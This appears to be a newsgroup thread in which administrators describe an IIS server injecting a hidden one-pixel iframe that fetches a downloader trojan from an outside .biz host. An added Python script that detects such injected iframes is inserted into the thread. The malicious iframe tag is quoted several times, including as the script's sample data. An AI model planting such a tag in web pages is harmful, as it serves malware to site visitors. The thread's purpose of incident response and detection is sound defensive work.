Virus in IFRAME injected into our ASP pages (downloader trojan on client)
Our website was compromised sometime in the last few days, but our
Antivirus (Symantec Corporate) when run on the server doesn't detect it.
It is a Windows Server 2003 Standard server, running SP1 and all the
latest patches. IIS sends down a website to the user with IFRAMEs
injected into the HTML:
<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
width=1 height=1></iframe></TD></A></TR></TABLE></TD>
The iframe code above pointing to xaqjlyswly.biz does not come from our
code. I looked at the ASP function that generates this link and there
is nothing there that would put that on the page.
The iframe tries to get the user's browser to download the Downloader
virus which, according to Symantec "connects to the Internet and
downloads other Trojan horses"
http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99
My local antivirus on my machine caught downloader getting installed
after browsing the site on the infected server.
I used Agent Ransack to look for the string ".biz" across all our
websites source code. The string wasn't found anywhere.
That all leads me to believe that something is getting injected into the
code before it is sent to the end user.
I found an older virus that has similar characteristics called
Download.Ject which infected IIS also. I followed Microsoft's
suggestions for detecting Download.Ject and we don't have it.
Any ideas?
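The post's own diagnosis is the key point: the string ".biz" is absent from every file on disk, yet it is present in what IIS delivers, so the injection happens at serving time and a file search cannot find it. The check that does work is to compare the page as served against the page as the template would render it, and flag any iframe that appears only in the served copy, is third-party, or is sized to be invisible. The script below is an added example, not code from the original poster; the sample strings are constructed from the fragment quoted in the post, and TRUSTED_HOSTS is a hypothetical list of the site's own hostnames.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical: the hostnames this site legitimately serves content from.
# Any other host in an iframe src is treated as third-party.
TRUSTED_HOSTS = {"www.example.com", "example.com"}

# Constructed sample input, modelled on the fragment in the post above:
# the page as the on-disk ASP template renders it (no iframe) ...
SOURCE_HTML = """<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
CLASS="ltblue"></a></TD></A></TR></TABLE></TD>"""

# ... and the same page as actually delivered by the compromised server.
SERVED_HTML = """<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
width=1 height=1></iframe></TD></A></TR></TABLE></TD>"""


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag it sees."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and strips quotes,
        # so the unquoted src=http://... form in the injected tag parses too.
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})

    handle_startendtag = handle_starttag  # also catch <iframe ... />


def find_iframes(html):
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.iframes


def _dimension(value):
    """Leading integer of a width/height attribute, or None if absent."""
    match = re.match(r"\s*(\d+)", value or "")
    return int(match.group(1)) if match else None


def iframe_host(iframe):
    return (urlparse(iframe.get("src", "")).hostname or "").lower()


def is_suspicious(iframe, trusted_hosts=TRUSTED_HOSTS):
    """True for iframes that are third-party or sized/styled to be invisible."""
    host = iframe_host(iframe)
    external = bool(host) and host not in trusted_hosts
    width, height = _dimension(iframe.get("width")), _dimension(iframe.get("height"))
    tiny = width is not None and height is not None and width <= 1 and height <= 1
    style = iframe.get("style", "").replace(" ", "").lower()
    hidden = "display:none" in style or "visibility:hidden" in style
    return external or tiny or hidden


def injected_iframes(served_html, source_html):
    """Iframes present in the delivered page but absent from the template output."""
    expected = {iframe.get("src", "") for iframe in find_iframes(source_html)}
    return [iframe for iframe in find_iframes(served_html)
            if iframe.get("src", "") not in expected]


def report(served_html, source_html):
    """(src, host) pairs for injected iframes that look malicious; block and investigate."""
    return [(iframe["src"], iframe_host(iframe))
            for iframe in injected_iframes(served_html, source_html)
            if is_suspicious(iframe)]


if __name__ == "__main__":
    for src, host in report(SERVED_HTML, SOURCE_HTML):
        print(f"injected iframe -> {src} (host {host})")
```

In practice SERVED_HTML would be fetched from the live server with a plain HTTP client and SOURCE_HTML taken from a known-good render of the same page (a staging copy or a backup); running the comparison from a machine other than the server also sidesteps any tampering with the server's own tools. A hit gives the host to block at the egress firewall and the first indicator to search for in IIS logs and in memory, which is where a serving-time injector lives rather than in the site's files.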
RE: Virus in IFRAME injected into our ASP pages (downloader trojan on client)
Hi Paul,
I believe the current situation indicates your web server got
hacked/attacked.
For such kinds of urgent cases of Virus/Trojan, I would like to suggest that
you contact Microsoft Customer Service and Support services as well as some
third-party security and anti-virus services vendor like Symantec for
assistance. You can call our support center via telephone so that a
dedicated Support Professional can assist with this request.
To obtain the phone numbers for specific technology request please take a
look at the web site listed below.
http://support.microsoft.com/default.aspx?scid=fh;EN-US;PHONENUMBERS
If you are outside the US please see http://support.microsoft.com for
regional support phone numbers.
Thanks.
Sincerely,
WenJun Zhang
Microsoft Online Community Support
==================================================
Get notification to my posts through email? Please refer to:
http://msdn.microsoft.com/subscriptions/managednewsgroups/default.aspx#notifications.
Note: The MSDN Managed Newsgroup support offering is for non-urgent issues
where an initial response from the community or a Microsoft Support
Engineer within 1 business day is acceptable. Please note that each follow
up response may take approximately 2 business days as the support
professional working with you may need further investigation to reach the
most efficient resolution. The offering is not appropriate for situations
that require urgent, real-time or phone-based interactions or complex
project analysis and dump analysis issues. Issues of this nature are best
handled working with a dedicated Microsoft Support Engineer by contacting
Microsoft Customer Support Services (CSS) at:
http://msdn.microsoft.com/subscriptions/support/default.aspx.
==================================================
This posting is provided "AS IS" with no warranties, and confers no rights.
Re: Virus in IFRAME injected into our ASP pages (downloader trojan on client)
We had the same problem on our windows 2003 server today.
We cannot find any information anywhere.
Any ideas???
Paul Oliver wrote:
> Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it.
>
> It is a Windows Server 2003 Standard server, running SP1 and all the
> latest patches. IIS sends down a website to the user with IFRAMEs
> injected into the HTML:
>
> <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
> NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
> ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
> CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
> width=1 height=1></iframe></TD></A></TR></TABLE></TD>
>
> The iframe code above pointing to xaqjlyswly.biz does not come from our
> code. I looked at the ASP function that generates this link and there
> is nothing there that would put that on the page.
>
> The iframe tries to get the user's browser to download the Downloader
> virus which, according to Symantec "connects to the Internet and
> downloads other Trojan horses"
>
> http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99
>
> My local antivirus on my machine caught downloader getting installed
> after browsing the site on the infected server.
>
> I used Agent Ransack to look for the string ".biz" across all our
> websites source code. The string wasn't found anywhere.
>
> That all leads me to believe that something is getting injected into the
> code before it is sent to the end user.
>
> I found an older virus that has similar characteristics called
> Download.Ject which infected IIS also. I followed Microsoft's
> suggestions for detecting Download.Ject and we don't have it.
>
> Any ideas?
Re: Virus in IFRAME injected into our ASP pages (downloader trojan on client)
We had to reinstall IIS on the server and it did the trick.
By the way, we tried Windows Defender and the Windows removal tools; neither
found anything. And after our tests, IIS was really compromised.
Any website running ASP or ASPX pages injected the iframe code. The hack
seems to have been at the core of IIS. ISAPI filter deactivation
didn't do the trick.
Any idea anyone what it was?
Leythos wrote:
> In article <uelbG$kGHHA.924 [at] TK2MSFTNGP02.phx.gbl>,
> PaulOliver [at] noemail.noemail says...
> > Our website was compromised sometime in the last few days, but our
> > Antivirus (Symantec Corporate) when run on the server doesn't detect it.
> >
> > It is a Windows Server 2003 Standard server, running SP1 and all the
> > latest patches. IIS sends down a website to the user with IFRAMEs
> > injected into the HTML:
> >
> > <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
> > NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
> > ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
> > CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
> > width=1 height=1></iframe></TD></A></TR></TABLE></TD>
> >
> > The iframe code above pointing to xaqjlyswly.biz does not come from our
> > code. I looked at the ASP function that generates this link and there
> > is nothing there that would put that on the page.
>
> The reason that Symantec didn't detect it on the server is because the
> threat (malware) is not on your server, it's on the remote server.
>
> > The iframe tries to get the user's browser to download the Downloader
> > virus which, according to Symantec "connects to the Internet and
> > downloads other Trojan horses"
> >
> > http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99
> >
> > My local antivirus on my machine caught downloader getting installed
> > after browsing the site on the infected server.
> >
> > I used Agent Ransack to look for the string ".biz" across all our
> > websites source code. The string wasn't found anywhere.
> >
> > That all leads me to believe that something is getting injected into the
> > code before it is sent to the end user.
> >
> > I found an older virus that has similar characteristics called
> > Download.Ject which infected IIS also. I followed Microsoft's
> > suggestions for detecting Download.Ject and we don't have it.
> >
> > Any ideas?
>
> Put a real firewall in front of your server, block all foreign subnets
> not required, rename the administrator account and disable all accounts
> not needed, patch the server, etc... Follow ALL of the recommendations
> that secure your server.
>
> What services, other than HTTP did you expose?
>
> --
>
> spam999free [at] rrohio.com
> remove 999 in order to email me